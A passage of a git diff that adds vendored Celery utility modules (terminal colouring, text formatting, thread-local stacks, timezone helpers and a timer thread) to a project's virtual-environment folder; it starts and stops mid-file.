TERM_IS_SCREEN else '\033]' +_IMG_POST = '\a\033\\' if TERM_IS_SCREEN else '\a' + + +def fg(s): + return COLOR_SEQ % s + + +class colored: + """Terminal colored text. + + Example: + >>> c = colored(enabled=True) + >>> print(str(c.red('the quick '), c.blue('brown ', c.bold('fox ')), + ... c.magenta(c.underline('jumps over')), + ... c.yellow(' the lazy '), + ... c.green('dog '))) + """ + + def __init__(self, *s, **kwargs): + self.s = s + self.enabled = not IS_WINDOWS and kwargs.get('enabled', True) + self.op = kwargs.get('op', '') + self.names = { + 'black': self.black, + 'red': self.red, + 'green': self.green, + 'yellow': self.yellow, + 'blue': self.blue, + 'magenta': self.magenta, + 'cyan': self.cyan, + 'white': self.white, + } + + def _add(self, a, b): + return str(a) + str(b) + + def _fold_no_color(self, a, b): + try: + A = a.no_color() + except AttributeError: + A = str(a) + try: + B = b.no_color() + except AttributeError: + B = str(b) + + return ''.join((str(A), str(B))) + + def no_color(self): + if self.s: + return str(reduce(self._fold_no_color, self.s)) + return '' + + def embed(self): + prefix = '' + if self.enabled: + prefix = self.op + return ''.join((str(prefix), str(reduce(self._add, self.s)))) + + def __str__(self): + suffix = '' + if self.enabled: + suffix = RESET_SEQ + return str(''.join((self.embed(), str(suffix)))) + + def node(self, s, op): + return self.__class__(enabled=self.enabled, op=op, *s) + + def black(self, *s): + return self.node(s, fg(30 + BLACK)) + + def red(self, *s): + return self.node(s, fg(30 + RED)) + + def green(self, *s): + return self.node(s, fg(30 + GREEN)) + + def yellow(self, *s): + return self.node(s, fg(30 + YELLOW)) + + def blue(self, *s): + return self.node(s, fg(30 + BLUE)) + + def magenta(self, *s): + return self.node(s, fg(30 + MAGENTA)) + + def cyan(self, *s): + return self.node(s, fg(30 + CYAN)) + + def white(self, *s): + return self.node(s, fg(30 + WHITE)) + + def __repr__(self): + return repr(self.no_color()) + + def bold(self, *s): + return self.node(s, OP_SEQ % 1) + + def underline(self, *s): + return self.node(s, OP_SEQ % 4) + + def blink(self, *s): + return self.node(s, OP_SEQ % 5) + + def reverse(self, *s): + return self.node(s, OP_SEQ % 7) + + def bright(self, *s): + return self.node(s, OP_SEQ % 8) + + def ired(self, *s): + return self.node(s, fg(40 + RED)) + + def igreen(self, *s): + return self.node(s, fg(40 + GREEN)) + + def iyellow(self, *s): + return self.node(s, fg(40 + YELLOW)) + + def iblue(self, *s): + return self.node(s, fg(40 + BLUE)) + + def imagenta(self, *s): + return self.node(s, fg(40 + MAGENTA)) + + def icyan(self, *s): + return self.node(s, fg(40 + CYAN)) + + def iwhite(self, *s): + return self.node(s, fg(40 + WHITE)) + + def reset(self, *s): + return self.node(s or [''], RESET_SEQ) + + def __add__(self, other): + return str(self) + str(other) + + +def supports_images(): + return sys.stdin.isatty() and ITERM_PROFILE + + +def _read_as_base64(path): + with codecs.open(path, mode='rb') as fh: + encoded = base64.b64encode(fh.read()) + return encoded if isinstance(encoded, str) else encoded.decode('ascii') + + +def imgcat(path, inline=1, preserve_aspect_ratio=0, **kwargs): + return '\n%s1337;File=inline=%d;preserveAspectRatio=%d:%s%s' % ( + _IMG_PRE, inline, preserve_aspect_ratio, + _read_as_base64(path), _IMG_POST) diff --git a/env/Lib/site-packages/celery/utils/text.py b/env/Lib/site-packages/celery/utils/text.py new file mode 100644 index 00000000..9d18a735 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/text.py @@ -0,0 +1,198 @@ +"""Text formatting utilities.""" +from __future__ import annotations + +import io +import re +from functools import partial +from pprint import pformat +from re import Match +from textwrap import fill +from typing import Any, Callable, Pattern + +__all__ = ( + 'abbr', 'abbrtask', 'dedent', 'dedent_initial', + 'ensure_newlines', 'ensure_sep', + 'fill_paragraphs', 'indent', 'join', + 'pluralize', 'pretty', 'str_to_list', 'simple_format', 'truncate', +) + +UNKNOWN_SIMPLE_FORMAT_KEY = """ +Unknown format %{0} in string {1!r}. +Possible causes: Did you forget to escape the expand sign (use '%%{0!r}'), +or did you escape and the value was expanded twice? (%%N -> %N -> %hostname)? +""".strip() + +RE_FORMAT = re.compile(r'%(\w)') + + +def str_to_list(s: str) -> list[str]: + """Convert string to list.""" + if isinstance(s, str): + return s.split(',') + return s + + +def dedent_initial(s: str, n: int = 4) -> str: + """Remove indentation from first line of text.""" + return s[n:] if s[:n] == ' ' * n else s + + +def dedent(s: str, sep: str = '\n') -> str: + """Remove indentation.""" + return sep.join(dedent_initial(l) for l in s.splitlines()) + + +def fill_paragraphs(s: str, width: int, sep: str = '\n') -> str: + """Fill paragraphs with newlines (or custom separator).""" + return sep.join(fill(p, width) for p in s.split(sep)) + + +def join(l: list[str], sep: str = '\n') -> str: + """Concatenate list of strings.""" + return sep.join(v for v in l if v) + + +def ensure_sep(sep: str, s: str, n: int = 2) -> str: + """Ensure text s ends in separator sep'.""" + return s + sep * (n - s.count(sep)) + + +ensure_newlines = partial(ensure_sep, '\n') + + +def abbr(S: str, max: int, ellipsis: str | bool = '...') -> str: + """Abbreviate word.""" + if S is None: + return '???' + if len(S) > max: + return isinstance(ellipsis, str) and ( + S[: max - len(ellipsis)] + ellipsis) or S[: max] + return S + + +def abbrtask(S: str, max: int) -> str: + """Abbreviate task name.""" + if S is None: + return '???' + if len(S) > max: + module, _, cls = S.rpartition('.') + module = abbr(module, max - len(cls) - 3, False) + return module + '[.]' + cls + return S + + +def indent(t: str, indent: int = 0, sep: str = '\n') -> str: + """Indent text.""" + return sep.join(' ' * indent + p for p in t.split(sep)) + + +def truncate(s: str, maxlen: int = 128, suffix: str = '...') -> str: + """Truncate text to a maximum number of characters.""" + if maxlen and len(s) >= maxlen: + return s[:maxlen].rsplit(' ', 1)[0] + suffix + return s + + +def pluralize(n: float, text: str, suffix: str = 's') -> str: + """Pluralize term when n is greater than one.""" + if n != 1: + return text + suffix + return text + + +def pretty(value: str, width: int = 80, nl_width: int = 80, sep: str = '\n', ** + kw: Any) -> str: + """Format value for printing to console.""" + if isinstance(value, dict): + return f'{sep} {pformat(value, 4, nl_width)[1:]}' + elif isinstance(value, tuple): + return '{}{}{}'.format( + sep, ' ' * 4, pformat(value, width=nl_width, **kw), + ) + else: + return pformat(value, width=width, **kw) + + +def match_case(s: str, other: str) -> str: + return s.upper() if other.isupper() else s.lower() + + +def simple_format( + s: str, keys: dict[str, str | Callable], + pattern: Pattern[str] = RE_FORMAT, expand: str = r'\1') -> str: + """Format string, expanding abbreviations in keys'.""" + if s: + keys.setdefault('%', '%') + + def resolve(match: Match) -> str | Any: + key = match.expand(expand) + try: + resolver = keys[key] + except KeyError: + raise ValueError(UNKNOWN_SIMPLE_FORMAT_KEY.format(key, s)) + if callable(resolver): + return resolver() + return resolver + + return pattern.sub(resolve, s) + return s + + +def remove_repeating_from_task(task_name: str, s: str) -> str: + """Given task name, remove repeating module names. + + Example: + >>> remove_repeating_from_task( + ... 'tasks.add', + ... 'tasks.add(2, 2), tasks.mul(3), tasks.div(4)') + 'tasks.add(2, 2), mul(3), div(4)' + """ + # This is used by e.g. repr(chain), to remove repeating module names. + # - extract the module part of the task name + module = str(task_name).rpartition('.')[0] + '.' + return remove_repeating(module, s) + + +def remove_repeating(substr: str, s: str) -> str: + """Remove repeating module names from string. + + Arguments: + task_name (str): Task name (full path including module), + to use as the basis for removing module names. + s (str): The string we want to work on. + + Example: + + >>> _shorten_names( + ... 'x.tasks.add', + ... 'x.tasks.add(2, 2) | x.tasks.add(4) | x.tasks.mul(8)', + ... ) + 'x.tasks.add(2, 2) | add(4) | mul(8)' + """ + # find the first occurrence of substr in the string. + index = s.find(substr) + if index >= 0: + return ''.join([ + # leave the first occurrence of substr untouched. + s[:index + len(substr)], + # strip seen substr from the rest of the string. + s[index + len(substr):].replace(substr, ''), + ]) + return s + + +StringIO = io.StringIO +_SIO_write = StringIO.write +_SIO_init = StringIO.__init__ + + +class WhateverIO(StringIO): + """StringIO that takes bytes or str.""" + + def __init__( + self, v: bytes | str | None = None, *a: Any, **kw: Any) -> None: + _SIO_init(self, v.decode() if isinstance(v, bytes) else v, *a, **kw) + + def write(self, data: bytes | str) -> int: + return _SIO_write(self, data.decode() + if isinstance(data, bytes) else data) diff --git a/env/Lib/site-packages/celery/utils/threads.py b/env/Lib/site-packages/celery/utils/threads.py new file mode 100644 index 00000000..d78461a9 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/threads.py @@ -0,0 +1,331 @@ +"""Threading primitives and utilities.""" +import os +import socket +import sys +import threading +import traceback +from contextlib import contextmanager +from threading import TIMEOUT_MAX as THREAD_TIMEOUT_MAX + +from celery.local import Proxy + +try: + from greenlet import getcurrent as get_ident +except ImportError: + try: + from _thread import get_ident + except ImportError: + try: + from thread import get_ident + except ImportError: + try: + from _dummy_thread import get_ident + except ImportError: + from dummy_thread import get_ident + + +__all__ = ( + 'bgThread', 'Local', 'LocalStack', 'LocalManager', + 'get_ident', 'default_socket_timeout', +) + +USE_FAST_LOCALS = os.environ.get('USE_FAST_LOCALS') + + +@contextmanager +def default_socket_timeout(timeout): + """Context temporarily setting the default socket timeout.""" + prev = socket.getdefaulttimeout() + socket.setdefaulttimeout(timeout) + yield + socket.setdefaulttimeout(prev) + + +class bgThread(threading.Thread): + """Background service thread.""" + + def __init__(self, name=None, **kwargs): + super().__init__() + self.__is_shutdown = threading.Event() + self.__is_stopped = threading.Event() + self.daemon = True + self.name = name or self.__class__.__name__ + + def body(self): + raise NotImplementedError() + + def on_crash(self, msg, *fmt, **kwargs): + print(msg.format(*fmt), file=sys.stderr) + traceback.print_exc(None, sys.stderr) + + def run(self): + body = self.body + shutdown_set = self.__is_shutdown.is_set + try: + while not shutdown_set(): + try: + body() + except Exception as exc: # pylint: disable=broad-except + try: + self.on_crash('{0!r} crashed: {1!r}', self.name, exc) + self._set_stopped() + finally: + sys.stderr.flush() + os._exit(1) # exiting by normal means won't work + finally: + self._set_stopped() + + def _set_stopped(self): + try: + self.__is_stopped.set() + except TypeError: # pragma: no cover + # we lost the race at interpreter shutdown, + # so gc collected built-in modules. + pass + + def stop(self): + """Graceful shutdown.""" + self.__is_shutdown.set() + self.__is_stopped.wait() + if self.is_alive(): + self.join(THREAD_TIMEOUT_MAX) + + +def release_local(local): + """Release the contents of the local for the current context. + + This makes it possible to use locals without a manager. + + With this function one can release :class:`Local` objects as well as + :class:`StackLocal` objects. However it's not possible to + release data held by proxies that way, one always has to retain + a reference to the underlying local object in order to be able + to release it. + + Example: + >>> loc = Local() + >>> loc.foo = 42 + >>> release_local(loc) + >>> hasattr(loc, 'foo') + False + """ + local.__release_local__() + + +class Local: + """Local object.""" + + __slots__ = ('__storage__', '__ident_func__') + + def __init__(self): + object.__setattr__(self, '__storage__', {}) + object.__setattr__(self, '__ident_func__', get_ident) + + def __iter__(self): + return iter(self.__storage__.items()) + + def __call__(self, proxy): + """Create a proxy for a name.""" + return Proxy(self, proxy) + + def __release_local__(self): + self.__storage__.pop(self.__ident_func__(), None) + + def __getattr__(self, name): + try: + return self.__storage__[self.__ident_func__()][name] + except KeyError: + raise AttributeError(name) + + def __setattr__(self, name, value): + ident = self.__ident_func__() + storage = self.__storage__ + try: + storage[ident][name] = value + except KeyError: + storage[ident] = {name: value} + + def __delattr__(self, name): + try: + del self.__storage__[self.__ident_func__()][name] + except KeyError: + raise AttributeError(name) + + +class _LocalStack: + """Local stack. + + This class works similar to a :class:`Local` but keeps a stack + of objects instead. This is best explained with an example:: + + >>> ls = LocalStack() + >>> ls.push(42) + >>> ls.top + 42 + >>> ls.push(23) + >>> ls.top + 23 + >>> ls.pop() + 23 + >>> ls.top + 42 + + They can be force released by using a :class:`LocalManager` or with + the :func:`release_local` function but the correct way is to pop the + item from the stack after using. When the stack is empty it will + no longer be bound to the current context (and as such released). + + By calling the stack without arguments it will return a proxy that + resolves to the topmost item on the stack. + """ + + def __init__(self): + self._local = Local() + + def __release_local__(self): + self._local.__release_local__() + + def _get__ident_func__(self): + return self._local.__ident_func__ + + def _set__ident_func__(self, value): + object.__setattr__(self._local, '__ident_func__', value) + __ident_func__ = property(_get__ident_func__, _set__ident_func__) + del _get__ident_func__, _set__ident_func__ + + def __call__(self): + def _lookup(): + rv = self.top + if rv is None: + raise RuntimeError('object unbound') + return rv + return Proxy(_lookup) + + def push(self, obj): + """Push a new item to the stack.""" + rv = getattr(self._local, 'stack', None) + if rv is None: + # pylint: disable=assigning-non-slot + # This attribute is defined now. + self._local.stack = rv = [] + rv.append(obj) + return rv + + def pop(self): + """Remove the topmost item from the stack. + + Note: + Will return the old value or `None` if the stack was already empty. + """ + stack = getattr(self._local, 'stack', None) + if stack is None: + return None + elif len(stack) == 1: + release_local(self._local) + return stack[-1] + else: + return stack.pop() + + def __len__(self): + stack = getattr(self._local, 'stack', None) + return len(stack) if stack else 0 + + @property + def stack(self): + # get_current_worker_task uses this to find + # the original task that was executed by the worker. + stack = getattr(self._local, 'stack', None) + if stack is not None: + return stack + return [] + + @property + def top(self): + """The topmost item on the stack. + + Note: + If the stack is empty, :const:`None` is returned. + """ + try: + return self._local.stack[-1] + except (AttributeError, IndexError): + return None + + +class LocalManager: + """Local objects cannot manage themselves. + + For that you need a local manager. + You can pass a local manager multiple locals or add them + later by appending them to ``manager.locals``. Every time the manager + cleans up, it will clean up all the data left in the locals for this + context. + + The ``ident_func`` parameter can be added to override the default ident + function for the wrapped locals. + """ + + def __init__(self, locals=None, ident_func=None): + if locals is None: + self.locals = [] + elif isinstance(locals, Local): + self.locals = [locals] + else: + self.locals = list(locals) + if ident_func is not None: + self.ident_func = ident_func + for local in self.locals: + object.__setattr__(local, '__ident_func__', ident_func) + else: + self.ident_func = get_ident + + def get_ident(self): + """Return context identifier. + + This is the identifier the local objects use internally + for this context. You cannot override this method to change the + behavior but use it to link other context local objects (such as + SQLAlchemy's scoped sessions) to the Werkzeug locals. + """ + return self.ident_func() + + def cleanup(self): + """Manually clean up the data in the locals for this context. + + Call this at the end of the request or use ``make_middleware()``. + """ + for local in self.locals: + release_local(local) + + def __repr__(self): + return '<{} storages: {}>'.format( + self.__class__.__name__, len(self.locals)) + + +class _FastLocalStack(threading.local): + + def __init__(self): + self.stack = [] + self.push = self.stack.append + self.pop = self.stack.pop + super().__init__() + + @property + def top(self): + try: + return self.stack[-1] + except (AttributeError, IndexError): + return None + + def __len__(self): + return len(self.stack) + + +if USE_FAST_LOCALS: # pragma: no cover + LocalStack = _FastLocalStack +else: # pragma: no cover + # - See #706 + # since each thread has its own greenlet we can just use those as + # identifiers for the context. If greenlets aren't available we + # fall back to the current thread ident. + LocalStack = _LocalStack diff --git a/env/Lib/site-packages/celery/utils/time.py b/env/Lib/site-packages/celery/utils/time.py new file mode 100644 index 00000000..f5329a5e --- /dev/null +++ b/env/Lib/site-packages/celery/utils/time.py @@ -0,0 +1,429 @@ +"""Utilities related to dates, times, intervals, and timezones.""" +from __future__ import annotations + +import numbers +import os +import random +import sys +import time as _time +from calendar import monthrange +from datetime import date, datetime, timedelta +from datetime import timezone as datetime_timezone +from datetime import tzinfo +from types import ModuleType +from typing import Any, Callable + +from dateutil import tz as dateutil_tz +from kombu.utils.functional import reprcall +from kombu.utils.objects import cached_property + +from .functional import dictfilter +from .text import pluralize + +if sys.version_info >= (3, 9): + from zoneinfo import ZoneInfo +else: + from backports.zoneinfo import ZoneInfo + + +__all__ = ( + 'LocalTimezone', 'timezone', 'maybe_timedelta', + 'delta_resolution', 'remaining', 'rate', 'weekday', + 'humanize_seconds', 'maybe_iso8601', 'is_naive', + 'make_aware', 'localize', 'to_utc', 'maybe_make_aware', + 'ffwd', 'utcoffset', 'adjust_timestamp', + 'get_exponential_backoff_interval', +) + +C_REMDEBUG = os.environ.get('C_REMDEBUG', False) + +DAYNAMES = 'sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat' +WEEKDAYS = dict(zip(DAYNAMES, range(7))) + +RATE_MODIFIER_MAP = { + 's': lambda n: n, + 'm': lambda n: n / 60.0, + 'h': lambda n: n / 60.0 / 60.0, +} + +TIME_UNITS = ( + ('day', 60 * 60 * 24.0, lambda n: format(n, '.2f')), + ('hour', 60 * 60.0, lambda n: format(n, '.2f')), + ('minute', 60.0, lambda n: format(n, '.2f')), + ('second', 1.0, lambda n: format(n, '.2f')), +) + +ZERO = timedelta(0) + +_local_timezone = None + + +class LocalTimezone(tzinfo): + """Local time implementation. Provided in _Zone to the app when `enable_utc` is disabled. + Otherwise, _Zone provides a UTC ZoneInfo instance as the timezone implementation for the application. + + Note: + Used only when the :setting:`enable_utc` setting is disabled. + """ + + _offset_cache: dict[int, tzinfo] = {} + + def __init__(self) -> None: + # This code is moved in __init__ to execute it as late as possible + # See get_default_timezone(). + self.STDOFFSET = timedelta(seconds=-_time.timezone) + if _time.daylight: + self.DSTOFFSET = timedelta(seconds=-_time.altzone) + else: + self.DSTOFFSET = self.STDOFFSET + self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET + super().__init__() + + def __repr__(self) -> str: + return f'' + + def utcoffset(self, dt: datetime) -> timedelta: + return self.DSTOFFSET if self._isdst(dt) else self.STDOFFSET + + def dst(self, dt: datetime) -> timedelta: + return self.DSTDIFF if self._isdst(dt) else ZERO + + def tzname(self, dt: datetime) -> str: + return _time.tzname[self._isdst(dt)] + + def fromutc(self, dt: datetime) -> datetime: + # The base tzinfo class no longer implements a DST + # offset aware .fromutc() in Python 3 (Issue #2306). + offset = int(self.utcoffset(dt).seconds / 60.0) + try: + tz = self._offset_cache[offset] + except KeyError: + tz = self._offset_cache[offset] = datetime_timezone( + timedelta(minutes=offset)) + return tz.fromutc(dt.replace(tzinfo=tz)) + + def _isdst(self, dt: datetime) -> bool: + tt = (dt.year, dt.month, dt.day, + dt.hour, dt.minute, dt.second, + dt.weekday(), 0, 0) + stamp = _time.mktime(tt) + tt = _time.localtime(stamp) + return tt.tm_isdst > 0 + + +class _Zone: + """Timezone class that provides the timezone for the application. + If `enable_utc` is disabled, LocalTimezone is provided as the timezone provider through local(). + Otherwise, this class provides a UTC ZoneInfo instance as the timezone provider for the application. + + Additionally this class provides a few utility methods for converting datetimes. + """ + + def tz_or_local(self, tzinfo: tzinfo | None = None) -> tzinfo: + """Return either our local timezone or the provided timezone.""" + + # pylint: disable=redefined-outer-name + if tzinfo is None: + return self.local + return self.get_timezone(tzinfo) + + def to_local(self, dt: datetime, local=None, orig=None): + """Converts a datetime to the local timezone.""" + + if is_naive(dt): + dt = make_aware(dt, orig or self.utc) + return localize(dt, self.tz_or_local(local)) + + def to_system(self, dt: datetime) -> datetime: + """Converts a datetime to the system timezone.""" + + # tz=None is a special case since Python 3.3, and will + # convert to the current local timezone (Issue #2306). + return dt.astimezone(tz=None) + + def to_local_fallback(self, dt: datetime) -> datetime: + """Converts a datetime to the local timezone, or the system timezone.""" + if is_naive(dt): + return make_aware(dt, self.local) + return localize(dt, self.local) + + def get_timezone(self, zone: str | tzinfo) -> tzinfo: + """Returns ZoneInfo timezone if the provided zone is a string, otherwise return the zone.""" + if isinstance(zone, str): + return ZoneInfo(zone) + return zone + + @cached_property + def local(self) -> LocalTimezone: + """Return LocalTimezone instance for the application.""" + return LocalTimezone() + + @cached_property + def utc(self) -> tzinfo: + """Return UTC timezone created with ZoneInfo.""" + return self.get_timezone('UTC') + + +timezone = _Zone() + + +def maybe_timedelta(delta: int) -> timedelta: + """Convert integer to timedelta, if argument is an integer.""" + if isinstance(delta, numbers.Real): + return timedelta(seconds=delta) + return delta + + +def delta_resolution(dt: datetime, delta: timedelta) -> datetime: + """Round a :class:`~datetime.datetime` to the resolution of timedelta. + + If the :class:`~datetime.timedelta` is in days, the + :class:`~datetime.datetime` will be rounded to the nearest days, + if the :class:`~datetime.timedelta` is in hours the + :class:`~datetime.datetime` will be rounded to the nearest hour, + and so on until seconds, which will just return the original + :class:`~datetime.datetime`. + """ + delta = max(delta.total_seconds(), 0) + + resolutions = ((3, lambda x: x / 86400), + (4, lambda x: x / 3600), + (5, lambda x: x / 60)) + + args = dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second + for res, predicate in resolutions: + if predicate(delta) >= 1.0: + return datetime(*args[:res], tzinfo=dt.tzinfo) + return dt + + +def remaining( + start: datetime, ends_in: timedelta, now: Callable | None = None, + relative: bool = False) -> timedelta: + """Calculate the remaining time for a start date and a timedelta. + + For example, "how many seconds left for 30 seconds after start?" + + Arguments: + start (~datetime.datetime): Starting date. + ends_in (~datetime.timedelta): The end delta. + relative (bool): If enabled the end time will be calculated + using :func:`delta_resolution` (i.e., rounded to the + resolution of `ends_in`). + now (Callable): Function returning the current time and date. + Defaults to :func:`datetime.utcnow`. + + Returns: + ~datetime.timedelta: Remaining time. + """ + now = now or datetime.utcnow() + if str( + start.tzinfo) == str( + now.tzinfo) and now.utcoffset() != start.utcoffset(): + # DST started/ended + start = start.replace(tzinfo=now.tzinfo) + end_date = start + ends_in + if relative: + end_date = delta_resolution(end_date, ends_in).replace(microsecond=0) + ret = end_date - now + if C_REMDEBUG: # pragma: no cover + print('rem: NOW:{!r} START:{!r} ENDS_IN:{!r} END_DATE:{} REM:{}'.format( + now, start, ends_in, end_date, ret)) + return ret + + +def rate(r: str) -> float: + """Convert rate string (`"100/m"`, `"2/h"` or `"0.5/s"`) to seconds.""" + if r: + if isinstance(r, str): + ops, _, modifier = r.partition('/') + return RATE_MODIFIER_MAP[modifier or 's'](float(ops)) or 0 + return r or 0 + return 0 + + +def weekday(name: str) -> int: + """Return the position of a weekday: 0 - 7, where 0 is Sunday. + + Example: + >>> weekday('sunday'), weekday('sun'), weekday('mon') + (0, 0, 1) + """ + abbreviation = name[0:3].lower() + try: + return WEEKDAYS[abbreviation] + except KeyError: + # Show original day name in exception, instead of abbr. + raise KeyError(name) + + +def humanize_seconds( + secs: int, prefix: str = '', sep: str = '', now: str = 'now', + microseconds: bool = False) -> str: + """Show seconds in human form. + + For example, 60 becomes "1 minute", and 7200 becomes "2 hours". + + Arguments: + prefix (str): can be used to add a preposition to the output + (e.g., 'in' will give 'in 1 second', but add nothing to 'now'). + now (str): Literal 'now'. + microseconds (bool): Include microseconds. + """ + secs = float(format(float(secs), '.2f')) + for unit, divider, formatter in TIME_UNITS: + if secs >= divider: + w = secs / float(divider) + return '{}{}{} {}'.format(prefix, sep, formatter(w), + pluralize(w, unit)) + if microseconds and secs > 0.0: + return '{prefix}{sep}{0:.2f} seconds'.format( + secs, sep=sep, prefix=prefix) + return now + + +def maybe_iso8601(dt: datetime | str | None) -> None | datetime: + """Either ``datetime | str -> datetime`` or ``None -> None``.""" + if not dt: + return + if isinstance(dt, datetime): + return dt + return datetime.fromisoformat(dt) + + +def is_naive(dt: datetime) -> bool: + """Return True if :class:`~datetime.datetime` is naive, meaning it doesn't have timezone info set.""" + return dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None + + +def _can_detect_ambiguous(tz: tzinfo) -> bool: + """Helper function to determine if a timezone can detect ambiguous times using dateutil.""" + + return isinstance(tz, ZoneInfo) or hasattr(tz, "is_ambiguous") + + +def _is_ambigious(dt: datetime, tz: tzinfo) -> bool: + """Helper function to determine if a timezone is ambiguous using python's dateutil module. + + Returns False if the timezone cannot detect ambiguity, or if there is no ambiguity, otherwise True. + + In order to detect ambiguous datetimes, the timezone must be built using ZoneInfo, or have an is_ambiguous + method. Previously, pytz timezones would throw an AmbiguousTimeError if the localized dt was ambiguous, + but now we need to specifically check for ambiguity with dateutil, as pytz is deprecated. + """ + + return _can_detect_ambiguous(tz) and dateutil_tz.datetime_ambiguous(dt) + + +def make_aware(dt: datetime, tz: tzinfo) -> datetime: + """Set timezone for a :class:`~datetime.datetime` object.""" + + dt = dt.replace(tzinfo=tz) + if _is_ambigious(dt, tz): + dt = min(dt.replace(fold=0), dt.replace(fold=1)) + return dt + + +def localize(dt: datetime, tz: tzinfo) -> datetime: + """Convert aware :class:`~datetime.datetime` to another timezone. + + Using a ZoneInfo timezone will give the most flexibility in terms of ambiguous DST handling. + """ + if is_naive(dt): # Ensure timezone aware datetime + dt = make_aware(dt, tz) + if dt.tzinfo == ZoneInfo("UTC"): + dt = dt.astimezone(tz) # Always safe to call astimezone on utc zones + return dt + + +def to_utc(dt: datetime) -> datetime: + """Convert naive :class:`~datetime.datetime` to UTC.""" + return make_aware(dt, timezone.utc) + + +def maybe_make_aware(dt: datetime, tz: tzinfo | None = None, + naive_as_utc: bool = True) -> datetime: + """Convert dt to aware datetime, do nothing if dt is already aware.""" + if is_naive(dt): + if naive_as_utc: + dt = to_utc(dt) + return localize( + dt, timezone.utc if tz is None else timezone.tz_or_local(tz), + ) + return dt + + +class ffwd: + """Version of ``dateutil.relativedelta`` that only supports addition.""" + + def __init__(self, year=None, month=None, weeks=0, weekday=None, day=None, + hour=None, minute=None, second=None, microsecond=None, + **kwargs: Any): + # pylint: disable=redefined-outer-name + # weekday is also a function in outer scope. + self.year = year + self.month = month + self.weeks = weeks + self.weekday = weekday + self.day = day + self.hour = hour + self.minute = minute + self.second = second + self.microsecond = microsecond + self.days = weeks * 7 + self._has_time = self.hour is not None or self.minute is not None + + def __repr__(self) -> str: + return reprcall('ffwd', (), self._fields(weeks=self.weeks, + weekday=self.weekday)) + + def __radd__(self, other: Any) -> timedelta: + if not isinstance(other, date): + return NotImplemented + year = self.year or other.year + month = self.month or other.month + day = min(monthrange(year, month)[1], self.day or other.day) + ret = other.replace(**dict(dictfilter(self._fields()), + year=year, month=month, day=day)) + if self.weekday is not None: + ret += timedelta(days=(7 - ret.weekday() + self.weekday) % 7) + return ret + timedelta(days=self.days) + + def _fields(self, **extra: Any) -> dict[str, Any]: + return dictfilter({ + 'year': self.year, 'month': self.month, 'day': self.day, + 'hour': self.hour, 'minute': self.minute, + 'second': self.second, 'microsecond': self.microsecond, + }, **extra) + + +def utcoffset( + time: ModuleType = _time, + localtime: Callable[..., _time.struct_time] = _time.localtime) -> float: + """Return the current offset to UTC in hours.""" + if localtime().tm_isdst: + return time.altzone // 3600 + return time.timezone // 3600 + + +def adjust_timestamp(ts: float, offset: int, + here: Callable[..., float] = utcoffset) -> float: + """Adjust timestamp based on provided utcoffset.""" + return ts - (offset - here()) * 3600 + + +def get_exponential_backoff_interval( + factor: int, + retries: int, + maximum: int, + full_jitter: bool = False +) -> int: + """Calculate the exponential backoff wait time.""" + # Will be zero if factor equals 0 + countdown = min(maximum, factor * (2 ** retries)) + # Full jitter according to + # https://aws.amazon.com/blogs/architecture/exponential-backoff-and-jitter/ + if full_jitter: + countdown = random.randrange(countdown + 1) + # Adjust according to maximum wait time and account for negative values. + return max(0, countdown) diff --git a/env/Lib/site-packages/celery/utils/timer2.py b/env/Lib/site-packages/celery/utils/timer2.py new file mode 100644 index 00000000..88d8ffd7 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/timer2.py @@ -0,0 +1,154 @@ +"""Scheduler for Python functions. + +.. note:: + This is used for the thread-based worker only, + not for amqp/redis/sqs/qpid where :mod:`kombu.asynchronous.timer` is used. +""" +import os +import sys +import threading +from itertools import count +from threading import TIMEOUT_MAX as THREAD_TIMEOUT_MAX +from time import sleep + +from kombu.asynchronous.timer import Entry +from kombu.asynchronous.timer import Timer as Schedule +from kombu.asynchronous.timer import logger, to_timestamp + +TIMER_DEBUG = os.environ.get('TIMER_DEBUG') + +__all__ = ('Entry', 'Schedule', 'Timer', 'to_timestamp') + + +class Timer(threading.Thread): + """Timer thread. + + Note: + This is only used for transports not supporting AsyncIO. + """ + + Entry = Entry + Schedule = Schedule + + running = False + on_tick = None + + _timer_count = count(1) + + if TIMER_DEBUG: # pragma: no cover + def start(self, *args, **kwargs): + import traceback + print('- Timer starting') + traceback.print_stack() + super().start(*args, **kwargs) + + def __init__(self, schedule=None, on_error=None, on_tick=None, + on_start=None, max_interval=None, **kwargs): + self.schedule = schedule or self.Schedule(on_error=on_error, + max_interval=max_interval) + self.on_start = on_start + self.on_tick = on_tick or self.on_tick + super().__init__() + # `_is_stopped` is likely to be an attribute on `Thread` objects so we + # double underscore these names to avoid shadowing anything and + # potentially getting confused by the superclass turning these into + # something other than an `Event` instance (e.g. a `bool`) + self.__is_shutdown = threading.Event() + self.__is_stopped = threading.Event() + self.mutex = threading.Lock() + self.not_empty = threading.Condition(self.mutex) + self.daemon = True + self.name = f'Timer-{next(self._timer_count)}' + + def _next_entry(self): + with self.not_empty: + delay, entry = next(self.scheduler) + if entry is None: + if delay is None: + self.not_empty.wait(1.0) + return delay + return self.schedule.apply_entry(entry) + __next__ = next = _next_entry # for 2to3 + + def run(self): + try: + self.running = True + self.scheduler = iter(self.schedule) + + while not self.__is_shutdown.is_set(): + delay = self._next_entry() + if delay: + if self.on_tick: + self.on_tick(delay) + if sleep is None: # pragma: no cover + break + sleep(delay) + try: + self.__is_stopped.set() + except TypeError: # pragma: no cover + # we lost the race at interpreter shutdown, + # so gc collected built-in modules. + pass + except Exception as exc: + logger.error('Thread Timer crashed: %r', exc, exc_info=True) + sys.stderr.flush() + os._exit(1) + + def stop(self): + self.__is_shutdown.set() + if self.running: + self.__is_stopped.wait() + self.join(THREAD_TIMEOUT_MAX) + self.running = False + + def ensure_started(self): + if not self.running and not self.is_alive(): + if self.on_start: + self.on_start(self) + self.start() + + def _do_enter(self, meth, *args, **kwargs): + self.ensure_started() + with self.mutex: + entry = getattr(self.schedule, meth)(*args, **kwargs) + self.not_empty.notify() + return entry + + def enter(self, entry, eta, priority=None): + return self._do_enter('enter_at', entry, eta, priority=priority) + + def call_at(self, *args, **kwargs): + return self._do_enter('call_at', *args, **kwargs) + + def enter_after(self, *args, **kwargs): + return self._do_enter('enter_after', *args, **kwargs) + + def call_after(self, *args, **kwargs): + return self._do_enter('call_after', *args, **kwargs) + + def call_repeatedly(self, *args, **kwargs): + return self._do_enter('call_repeatedly', 